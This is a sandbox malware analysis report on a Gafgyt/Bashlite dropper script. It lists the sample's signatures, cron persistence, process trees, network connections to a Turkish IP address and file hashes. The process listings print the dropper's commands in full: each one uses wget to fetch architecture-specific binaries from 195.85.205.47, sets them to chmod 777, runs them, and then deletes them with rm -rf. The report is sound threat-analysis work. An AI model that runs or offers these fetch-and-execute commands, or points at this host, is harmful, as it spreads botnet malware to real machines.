Analysis Overview
SHA256
ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d
Threat Level: Known bad
The file qkdjdjj22.sh was found to be: Known bad.
Malicious Activity Summary
Gafgyt/Bashlite
Detected Gafgyt variant
Executes dropped EXE
Reads system routing table
Creates/modifies Cron job
Writes file to system bin folder
Reads system network configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-02 05:54
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-mipsel-20240611-en
Max time kernel
145s
Max time network
148s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mpsl | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mpsl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fileJho6MR | /tmp/fileJho6MR | N/A |
| N/A | /tmp/filevTFhk3 | /tmp/filevTFhk3 | N/A |
| N/A | /tmp/filemoTV0H | /tmp/filemoTV0H | N/A |
| N/A | /tmp/filemf5pux | /tmp/filemf5pux | N/A |
| N/A | /tmp/filezwRxwh | /tmp/filezwRxwh | N/A |
| N/A | /tmp/file8FktrW | /tmp/file8FktrW | N/A |
| N/A | /tmp/fileg8yT9O | /tmp/fileg8yT9O | N/A |
| N/A | /tmp/filef9VCKz | /tmp/filef9VCKz | N/A |
| N/A | /tmp/fileAwhu1d | /tmp/fileAwhu1d | N/A |
| N/A | /tmp/fileokqn75 | /tmp/fileokqn75 | N/A |
| N/A | /tmp/fileVGk0HK | /tmp/fileVGk0HK | N/A |
| N/A | /tmp/fileqcFGiv | /tmp/fileqcFGiv | N/A |
| N/A | /tmp/file2jWCUi | /tmp/file2jWCUi | N/A |
| N/A | /tmp/fileBz8oDT | /tmp/fileBz8oDT | N/A |
| N/A | /tmp/filenniY0H | /tmp/filenniY0H | N/A |
| N/A | /tmp/fileIwkh7m | /tmp/fileIwkh7m | N/A |
| N/A | /tmp/fileteLex4 | /tmp/fileteLex4 | N/A |
| N/A | /tmp/filenedGUR | /tmp/filenedGUR | N/A |
| N/A | /tmp/file6VXMex | /tmp/file6VXMex | N/A |
| N/A | /tmp/filew50Oyk | /tmp/filew50Oyk | N/A |
| N/A | /tmp/fileFmjhi3 | /tmp/fileFmjhi3 | N/A |
| N/A | /tmp/filewPck2K | /tmp/filewPck2K | N/A |
| N/A | /tmp/file6sOBaB | /tmp/file6sOBaB | N/A |
| N/A | /tmp/filefkDICi | /tmp/filefkDICi | N/A |
| N/A | /tmp/file3J2Nd9 | /tmp/file3J2Nd9 | N/A |
| N/A | /tmp/fileQGbeHL | /tmp/fileQGbeHL | N/A |
| N/A | /tmp/filenoKEBq | /tmp/filenoKEBq | N/A |
| N/A | /tmp/fileftbCGc | /tmp/fileftbCGc | N/A |
| N/A | /tmp/filey8hRDP | /tmp/filey8hRDP | N/A |
| N/A | /tmp/fileGtV1PD | /tmp/fileGtV1PD | N/A |
| N/A | /tmp/filethlCNg | /tmp/filethlCNg | N/A |
| N/A | /tmp/fileWYbBRU | /tmp/fileWYbBRU | N/A |
| N/A | /tmp/filemSUsWJ | /tmp/filemSUsWJ | N/A |
| N/A | /tmp/fileTDRill | /tmp/fileTDRill | N/A |
| N/A | /tmp/file3uxPvb | /tmp/file3uxPvb | N/A |
| N/A | /tmp/fileK2GtNR | /tmp/fileK2GtNR | N/A |
| N/A | /tmp/filebjs9Px | /tmp/filebjs9Px | N/A |
| N/A | /tmp/file19a5Kp | /tmp/file19a5Kp | N/A |
| N/A | /tmp/filesATcHW | /tmp/filesATcHW | N/A |
| N/A | /tmp/fileYsSZ0F | /tmp/fileYsSZ0F | N/A |
| N/A | /tmp/filevINkRc | /tmp/filevINkRc | N/A |
| N/A | /tmp/fileHknWj4 | /tmp/fileHknWj4 | N/A |
| N/A | /tmp/file49kSUK | /tmp/file49kSUK | N/A |
| N/A | /tmp/filezzTlep | /tmp/filezzTlep | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenniY0H | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filesATcHW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileHknWj4 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file49kSUK | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/qkdjdjj22.x86 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileg8yT9O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileqcFGiv | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file2jWCUi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filezwRxwh | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filew50Oyk | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevINkRc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filey8hRDP | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileTDRill | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileK2GtNR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileWYbBRU | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filef9VCKz | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileVGk0HK | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenedGUR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenoKEBq | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filethlCNg | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemSUsWJ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileBz8oDT | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileFmjhi3 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filefkDICi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileftbCGc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileIwkh7m | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3J2Nd9 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileQGbeHL | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileAwhu1d | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileokqn75 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileteLex4 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file6VXMex | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevTFhk3 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemoTV0H | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemf5pux | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file8FktrW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGtV1PD | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3uxPvb | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileYsSZ0F | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file19a5Kp | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileJho6MR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filewPck2K | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file6sOBaB | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filebjs9Px | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.x32 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.i586 | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/ls | /tmp/qkdjdjj22.x86 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.x32 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.i586 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/fileFmjhi3 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filethlCNg | N/A |
| File opened for reading | /proc/self/exe | /tmp/filesATcHW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileHknWj4 | N/A |
| File opened for reading | /proc/self/exe | /tmp/qkdjdjj22.x86 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileJho6MR | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileg8yT9O | N/A |
| File opened for reading | /proc/self/exe | /tmp/file6sOBaB | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileQGbeHL | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGtV1PD | N/A |
| File opened for reading | /proc/self/exe | /tmp/file19a5Kp | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemf5pux | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileBz8oDT | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileIwkh7m | N/A |
| File opened for reading | /proc/self/exe | /tmp/filewPck2K | N/A |
| File opened for reading | /proc/self/exe | /tmp/filefkDICi | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3J2Nd9 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filey8hRDP | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileYsSZ0F | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemoTV0H | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenniY0H | N/A |
| File opened for reading | /proc/self/exe | /tmp/file6VXMex | N/A |
| File opened for reading | /proc/self/exe | /tmp/file49kSUK | N/A |
| File opened for reading | /proc/self/exe | /tmp/file8FktrW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileWYbBRU | N/A |
| File opened for reading | /proc/self/exe | /tmp/filebjs9Px | N/A |
| File opened for reading | /proc/self/exe | /tmp/filef9VCKz | N/A |
| File opened for reading | /proc/self/exe | /tmp/file2jWCUi | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileVGk0HK | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileqcFGiv | N/A |
| File opened for reading | /proc/self/exe | /tmp/filew50Oyk | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenoKEBq | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemSUsWJ | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevTFhk3 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileAwhu1d | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileokqn75 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filezzTlep | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3uxPvb | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileK2GtNR | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevINkRc | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileteLex4 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenedGUR | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileftbCGc | N/A |
| File opened for reading | /proc/self/exe | /tmp/filezwRxwh | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileTDRill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/file3uxPvb | /tmp/fileTDRill | N/A |
| File opened for modification | /tmp/file19a5Kp | /tmp/filebjs9Px | N/A |
| File opened for modification | /tmp/filesATcHW | /tmp/file19a5Kp | N/A |
| File opened for modification | /tmp/fileHknWj4 | /tmp/filevINkRc | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileVGk0HK | /tmp/fileokqn75 | N/A |
| File opened for modification | /tmp/fileIwkh7m | /tmp/filenniY0H | N/A |
| File opened for modification | /tmp/filezzTlep | /tmp/file49kSUK | N/A |
| File opened for modification | /tmp/filemf5pux | /tmp/filemoTV0H | N/A |
| File opened for modification | /tmp/file8FktrW | /tmp/filezwRxwh | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filevTFhk3 | /tmp/fileJho6MR | N/A |
| File opened for modification | /tmp/fileg8yT9O | /tmp/file8FktrW | N/A |
| File opened for modification | /tmp/fileqcFGiv | /tmp/fileVGk0HK | N/A |
| File opened for modification | /tmp/filenoKEBq | /tmp/fileQGbeHL | N/A |
| File opened for modification | /tmp/fileGtV1PD | /tmp/filey8hRDP | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filew50Oyk | /tmp/file6VXMex | N/A |
| File opened for modification | /tmp/file6sOBaB | /tmp/filewPck2K | N/A |
| File opened for modification | /tmp/filevINkRc | /tmp/fileYsSZ0F | N/A |
| File opened for modification | /tmp/file3J2Nd9 | /tmp/filefkDICi | N/A |
| File opened for modification | /tmp/fileK2GtNR | /tmp/file3uxPvb | N/A |
| File opened for modification | /tmp/fileteLex4 | /tmp/fileIwkh7m | N/A |
| File opened for modification | /tmp/filewPck2K | /tmp/fileFmjhi3 | N/A |
| File opened for modification | /tmp/fileftbCGc | /tmp/filenoKEBq | N/A |
| File opened for modification | /tmp/filemoTV0H | /tmp/filevTFhk3 | N/A |
| File opened for modification | /tmp/filezwRxwh | /tmp/filemf5pux | N/A |
| File opened for modification | /tmp/filemSUsWJ | /tmp/fileWYbBRU | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filebjs9Px | /tmp/fileK2GtNR | N/A |
| File opened for modification | /tmp/fileYsSZ0F | /tmp/filesATcHW | N/A |
| File opened for modification | /tmp/filenedGUR | /tmp/fileteLex4 | N/A |
| File opened for modification | /tmp/fileTDRill | /tmp/filemSUsWJ | N/A |
| File opened for modification | /tmp/filef9VCKz | /tmp/fileg8yT9O | N/A |
| File opened for modification | /tmp/fileQGbeHL | /tmp/file3J2Nd9 | N/A |
| File opened for modification | /tmp/fileJho6MR | /tmp/qkdjdjj22.x86 | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filey8hRDP | /tmp/fileftbCGc | N/A |
| File opened for modification | /tmp/filethlCNg | /tmp/fileGtV1PD | N/A |
| File opened for modification | /tmp/file49kSUK | /tmp/fileHknWj4 | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileokqn75 | /tmp/fileAwhu1d | N/A |
| File opened for modification | /tmp/fileBz8oDT | /tmp/file2jWCUi | N/A |
| File opened for modification | /tmp/filenniY0H | /tmp/fileBz8oDT | N/A |
| File opened for modification | /tmp/file2jWCUi | /tmp/fileqcFGiv | N/A |
| File opened for modification | /tmp/fileFmjhi3 | /tmp/filew50Oyk | N/A |
| File opened for modification | /tmp/filefkDICi | /tmp/file6sOBaB | N/A |
| File opened for modification | /tmp/fileWYbBRU | /tmp/filethlCNg | N/A |
| File opened for modification | /tmp/filefjW10d | /tmp/filezzTlep | N/A |
| File opened for modification | /tmp/fileAwhu1d | /tmp/filef9VCKz | N/A |
| File opened for modification | /tmp/file6VXMex | /tmp/filenedGUR | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/tmp/fileJho6MR
[./qkdjdjj22.x86]
/tmp/filevTFhk3
[./qkdjdjj22.x86]
/tmp/filemoTV0H
[./qkdjdjj22.x86]
/tmp/filemf5pux
[./qkdjdjj22.x86]
/tmp/filezwRxwh
[./qkdjdjj22.x86]
/tmp/file8FktrW
[./qkdjdjj22.x86]
/tmp/fileg8yT9O
[./qkdjdjj22.x86]
/tmp/filef9VCKz
[./qkdjdjj22.x86]
/tmp/fileAwhu1d
[./qkdjdjj22.x86]
/tmp/fileokqn75
[./qkdjdjj22.x86]
/tmp/fileVGk0HK
[./qkdjdjj22.x86]
/tmp/fileqcFGiv
[./qkdjdjj22.x86]
/tmp/file2jWCUi
[./qkdjdjj22.x86]
/tmp/fileBz8oDT
[./qkdjdjj22.x86]
/tmp/filenniY0H
[./qkdjdjj22.x86]
/tmp/fileIwkh7m
[./qkdjdjj22.x86]
/tmp/fileteLex4
[./qkdjdjj22.x86]
/tmp/filenedGUR
[./qkdjdjj22.x86]
/tmp/file6VXMex
[./qkdjdjj22.x86]
/tmp/filew50Oyk
[./qkdjdjj22.x86]
/tmp/fileFmjhi3
[./qkdjdjj22.x86]
/tmp/filewPck2K
[./qkdjdjj22.x86]
/tmp/file6sOBaB
[./qkdjdjj22.x86]
/tmp/filefkDICi
[./qkdjdjj22.x86]
/tmp/file3J2Nd9
[./qkdjdjj22.x86]
/tmp/fileQGbeHL
[./qkdjdjj22.x86]
/tmp/filenoKEBq
[./qkdjdjj22.x86]
/tmp/fileftbCGc
[./qkdjdjj22.x86]
/tmp/filey8hRDP
[./qkdjdjj22.x86]
/tmp/fileGtV1PD
[./qkdjdjj22.x86]
/tmp/filethlCNg
[./qkdjdjj22.x86]
/tmp/fileWYbBRU
[./qkdjdjj22.x86]
/tmp/filemSUsWJ
[./qkdjdjj22.x86]
/tmp/fileTDRill
[./qkdjdjj22.x86]
/tmp/file3uxPvb
[./qkdjdjj22.x86]
/tmp/fileK2GtNR
[./qkdjdjj22.x86]
/tmp/filebjs9Px
[./qkdjdjj22.x86]
/tmp/file19a5Kp
[./qkdjdjj22.x86]
/tmp/filesATcHW
[./qkdjdjj22.x86]
/tmp/fileYsSZ0F
[./qkdjdjj22.x86]
/tmp/filevINkRc
[./qkdjdjj22.x86]
/tmp/fileHknWj4
[./qkdjdjj22.x86]
/tmp/file49kSUK
[./qkdjdjj22.x86]
/tmp/filezzTlep
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 195.181.164.19:443 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp |
Files
/tmp/fileJho6MR
| MD5 | d7c06cd80f877b3697b829ee12851d5d |
| SHA1 | 977a6258d47f140effe07e1b1d6a93ea161ad138 |
| SHA256 | 4fedb406cadc190c90b552b01e5cb1891568db837cccd121fa9965223d21bc22 |
| SHA512 | 19f524abef2e7ffd9908ef34459c6388780e30d69499315a1b70362441ab897af1158bd14c0133d3be8bb27381787c6062f55e8d99be06ee93736cbba535d295 |
